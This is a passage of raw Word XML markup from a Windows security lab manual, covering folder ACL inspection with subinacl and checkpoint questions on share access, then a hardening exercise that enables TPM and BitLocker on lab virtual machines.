        <w:t xml:space="preserve"> folder using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>subinacl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: "</w:t>
      </w:r>
      <w:r w:rsidR="009A598E" w:rsidRPr="009A598E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>c:\_tools\subinacl /file C:\_DATA\CONFIDENTIAL /display</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D67E4C5" w14:textId="08766C36" w:rsidR="009A598E" w:rsidRDefault="009A598E" w:rsidP="009A598E">
      <w:r>
        <w:t xml:space="preserve">Look at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>subinacl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> output and focus on lines </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>"/pace=</w:t>
      </w:r>
      <w:r>
        <w:t>" that enumerates the group/account privilege set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7CB1F1" w14:textId="577D69D5" w:rsidR="009A598E" w:rsidRDefault="009A598E"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9A598E" w14:paraId="219A0ABD"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73C32CC9" w14:textId="77777777" w:rsidR="009A598E" w:rsidRDefault="009A598E" w:rsidP="00457366">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A598E" w14:paraId="25F3E18E"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2A8805" w14:textId="77777777" w:rsidR="009A598E" w:rsidRDefault="009A598E" w:rsidP="00457366">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="38" w:name="_Hlk533195865"/>
            <w:r>
              <w:t xml:space="preserve">Why the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A598E">
              <w:t>badboy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> domain admin account does not have permission?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D9AC7E8" w14:textId="2A92390A" w:rsidR="009A598E" w:rsidRDefault="009A598E" w:rsidP="00457366">
            <w:bookmarkStart w:id="39" w:name="_Hlk533196006"/>
            <w:bookmarkEnd w:id="38"/>
            <w:r>
              <w:t>How can you grant permission?</w:t>
            </w:r>
            <w:bookmarkEnd w:id="39"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BF834BA" w14:textId="46A30122" w:rsidR="009A598E" w:rsidRDefault="009A598E" w:rsidP="008F73F0"/>
    <w:p w14:paraId="0BA0C4FD" w14:textId="77777777" w:rsidR="0048105F" w:rsidRDefault="0048105F" w:rsidP="009D46CA">
      <w:r>
        <w:t xml:space="preserve">Grant </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badboy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> permission to access the folder CONFIDENTIAL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFD0146" w14:textId="77777777" w:rsidR="0048105F" w:rsidRDefault="0048105F" w:rsidP="009D46CA">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You can use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>subinacl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F2BE08" w14:textId="720DEF80" w:rsidR="00685073" w:rsidRDefault="0048105F" w:rsidP="009D46CA">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You can add </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badboy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in the correct security group in the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6EA964" w14:textId="1BA9EF59" w:rsidR="003F5CA7" w:rsidRDefault="00685073">
      <w:r>
        <w:t xml:space="preserve">Take a screen shot of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>subinacl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> permission for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badboy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4C53CD" w14:textId="5BF52F4A" w:rsidR="008F73F0" w:rsidRDefault="008F73F0" w:rsidP="005E589A"/>
    <w:p w14:paraId="2B826686" w14:textId="614FE7E5" w:rsidR="003B75F7" w:rsidRDefault="00A976A8" w:rsidP="00A976A8">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Browse to </w:t>
      </w:r>
      <w:hyperlink r:id="rId51" w:history="1">
        <w:r w:rsidRPr="009D647E">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>\\contoso.lab\hr\restricted</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570D1E35" w14:textId="51802FBB" w:rsidR="00A976A8" w:rsidRDefault="00A976A8"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A976A8" w14:paraId="7599B034"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2D4CC7CC" w14:textId="77777777" w:rsidR="00A976A8" w:rsidRDefault="00A976A8" w:rsidP="00457366">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A976A8" w14:paraId="3E907419"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1225E82" w14:textId="1ED367C1" w:rsidR="00A976A8" w:rsidRDefault="00A976A8" w:rsidP="00457366">
            <w:bookmarkStart w:id="40" w:name="_Hlk533195727"/>
            <w:r>
              <w:t xml:space="preserve">What is the word in the file </w:t>
            </w:r>
            <w:r w:rsidRPr="00A976A8">
              <w:t>\\contoso.lab\HR\RESTRICTED\HR file.txt</w:t>
            </w:r>
            <w:bookmarkEnd w:id="40"/>
            <w:r>
              <w:t>?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C14D1A0" w14:textId="55BACFB9" w:rsidR="003F5CA7" w:rsidRDefault="003F5CA7" w:rsidP="005E589A"/>
    <w:p w14:paraId="7ABFDBEC" w14:textId="77777777" w:rsidR="003F5CA7" w:rsidRDefault="003F5CA7" w:rsidP="005E589A"/>
    <w:p w14:paraId="2BA59DF7" w14:textId="1A2AAAA0" w:rsidR="00DA65BC" w:rsidRDefault="00BE3E57" w:rsidP="00BE3E57">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5297DE6C" w14:textId="6CA86EB1" w:rsidR="00F954C8" w:rsidRPr="00F954C8" w:rsidRDefault="001D3237" w:rsidP="00BB1DFB">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc44075686"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidRPr="001D3237">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Exercise </w:t>
      </w:r>
      <w:r w:rsidR="0013776F">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="001D3237">
        <w:t xml:space="preserve">: Windows 10 </w:t>
      </w:r>
      <w:r w:rsidR="0013776F">
        <w:t>hardening</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="1C60267E" w14:textId="4ACBF878" w:rsidR="003779C9" w:rsidRPr="00C6425D" w:rsidRDefault="00B84E53" w:rsidP="003779C9">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Duration: </w:t>
      </w:r>
      <w:r w:rsidR="00ED41C0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidR="007432F2" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="003779C9" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC34075" w14:textId="311F109A" w:rsidR="00F954C8" w:rsidRPr="00C6425D" w:rsidRDefault="00B84E53" w:rsidP="003779C9">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In this exercise, attendees will </w:t>
      </w:r>
      <w:r w:rsidR="0013776F" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>create polic</w:t>
      </w:r>
      <w:r w:rsidR="007432F2" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ies</w:t>
      </w:r>
      <w:r w:rsidR="008900FF" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and security settings to harden system</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C1188C" w14:textId="1C56E955" w:rsidR="00516584" w:rsidRPr="00F20CB2" w:rsidRDefault="005C10A1" w:rsidP="00F20CB2">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc44075687"/>
      <w:r w:rsidRPr="00F20CB2">
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r w:rsidR="00ED41C0">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F20CB2">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F20CB2" w:rsidRPr="00F20CB2">
        <w:t>Bit</w:t>
      </w:r>
      <w:r w:rsidR="006B7922">
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00F20CB2" w:rsidRPr="00F20CB2">
        <w:t>ock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F20CB2" w:rsidRPr="00F20CB2">
        <w:t xml:space="preserve"> the Windows system drive</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="6BB9E253" w14:textId="35DA235A" w:rsidR="00070C99" w:rsidRDefault="006B1002" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:i/>
        </w:rPr>
        <w:t>In this lab you will improve how to encrypt volume using BitLocker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8B06CB" w14:textId="77777777" w:rsidR="005F03AD" w:rsidRPr="00C6425D" w:rsidRDefault="005F03AD" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="259217C9" w14:textId="71CB4B91" w:rsidR="0099427F" w:rsidRDefault="0099427F" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">If you need to </w:t>
      </w:r>
      <w:r w:rsidR="009D7D36">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">deploy </w:t>
      </w:r>
      <w:r w:rsidR="005F03AD">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">BitLocker </w:t>
      </w:r>
      <w:r w:rsidR="009D7D36">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>using group policy, you might read these articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6789DD61" w14:textId="274F6012" w:rsidR="009D7D36" w:rsidRDefault="007621D5" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId52" w:history="1">
        <w:r w:rsidR="009D7D36" w:rsidRPr="009D647E">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:rFonts w:cs="Segoe UI"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/windows/security/information-protection/bitlocker/bitlocker-group-policy-settings</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009D7D36">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9D3777" w14:textId="18B64EA6" w:rsidR="009D7D36" w:rsidRDefault="007621D5" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId53" w:history="1">
        <w:r w:rsidR="009D7D36" w:rsidRPr="009D647E">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:rFonts w:cs="Segoe UI"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/microsoft-desktop-optimization-pack/mbam-v25/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3627E0AA" w14:textId="2B256C4E" w:rsidR="009D7D36" w:rsidRDefault="009D7D36" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143E0D70" w14:textId="77777777" w:rsidR="009D7D36" w:rsidRDefault="009D7D36" w:rsidP="009D7D36">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Target machine: VICTIM-PC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708AA62D" w14:textId="77777777" w:rsidR="009D7D36" w:rsidRDefault="009D7D36" w:rsidP="009D7D36">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Stop machine if running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2861FEC1" w14:textId="36160CA1" w:rsidR="009D7D36" w:rsidRDefault="009D7D36" w:rsidP="009D7D36">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Edit Virtual Machine settings and ensure in security part the option "</w:t>
      </w:r>
      <w:r w:rsidRPr="009D7D36">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Enable Trusted Platform Module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>" is selected:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3C30BA" w14:textId="61330043" w:rsidR="009D7D36" w:rsidRPr="009D7D36" w:rsidRDefault="009D7D36" w:rsidP="009D7D36">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D7D36">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C9E0645" wp14:editId="55636F8A">
            <wp:extent cx="3333774" cy="20764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3774" cy="2076465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B8B70A" w14:textId="4A6FA5DD" w:rsidR="009D7D36" w:rsidRDefault="009D7D36" w:rsidP="009D7D36">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Start VM and l</w:t>
      </w:r>
      <w:r w:rsidRPr="009D7D36">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>ogon on VICTIM-PC using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> CONTOSO\Administrator account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED70A63" w14:textId="40546FD5" w:rsidR="009D7D36" w:rsidRPr="009D7D36" w:rsidRDefault="009D7D36" w:rsidP="009D7D36">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Control Panel\All Control Panel Items\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bitlocker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Drive Encryption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and select to encrypt System drive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592FEB4E" w14:textId="06EF4D0A" w:rsidR="0099427F" w:rsidRDefault="0099427F" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="256B363A" w14:textId="224323C3" w:rsidR="009D7D36" w:rsidRDefault="009D7D36" w:rsidP="009D7D36">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Target machine VICTIM-SRV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB379D8" w14:textId="77777777" w:rsidR="009D7D36" w:rsidRDefault="009D7D36" w:rsidP="009D7D36">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Stop machine if running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025639FA" w14:textId="77777777" w:rsidR="009D7D36" w:rsidRDefault="009D7D36" w:rsidP="009D7D36">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Edit Virtual Machine settings and ensure in security part the option "</w:t>
      </w:r>
      <w:r w:rsidRPr="009D7D36">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Enable Trusted Platform Module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>" is selected:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FACB84" w14:textId="2DD14F46" w:rsidR="009D7D36" w:rsidRDefault="009D7D36" w:rsidP="009D7D36">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D7D36">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="705E5A6C" wp14:editId="6EBFDF69">
            <wp:extent cx="3333774" cy="20764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3774" cy="2076465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EE6B4D" w14:textId="17D35AD1" w:rsidR="00EC0099" w:rsidRDefault="00EC0099" w:rsidP="00EC0099">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Start VM and l</w:t>
      </w:r>
      <w:r w:rsidRPr="009D7D36">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>ogon on VICTIM-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>SRV</w:t>
      </w:r>
      <w:r w:rsidRPr="009D7D36">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> CONTOSO\Administrator account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224FD2D4" w14:textId="7AC6F96D" w:rsidR="00EC0099" w:rsidRDefault="00EC0099" w:rsidP="00EC0099">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC0099">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>In Server Manager, go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC0099">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>to Manage/Add Role and Feat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>ures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E837C3" w14:textId="5BB4FC58" w:rsidR="00EC0099" w:rsidRDefault="00EC0099" w:rsidP="00EC0099">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">On Feature part select </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC0099">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>BitLocker Drive Encryption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> in list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4941A2FF" w14:textId="7A760ACA" w:rsidR="00EC0099" w:rsidRDefault="00EC0099" w:rsidP="00EC0099">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Accept related features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D88D1D8" w14:textId="7530C3A6" w:rsidR="001D0546" w:rsidRDefault="001D0546" w:rsidP="00EC0099">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Complete wizard and restart VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACE9F87" w14:textId="1F1EF72F" w:rsidR="001D0546" w:rsidRPr="00EC0099" w:rsidRDefault="001D0546" w:rsidP="001D0546">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Reboot (</w:t>
      </w:r>
      <w:r w:rsidR="00551EC5">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>sometimes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
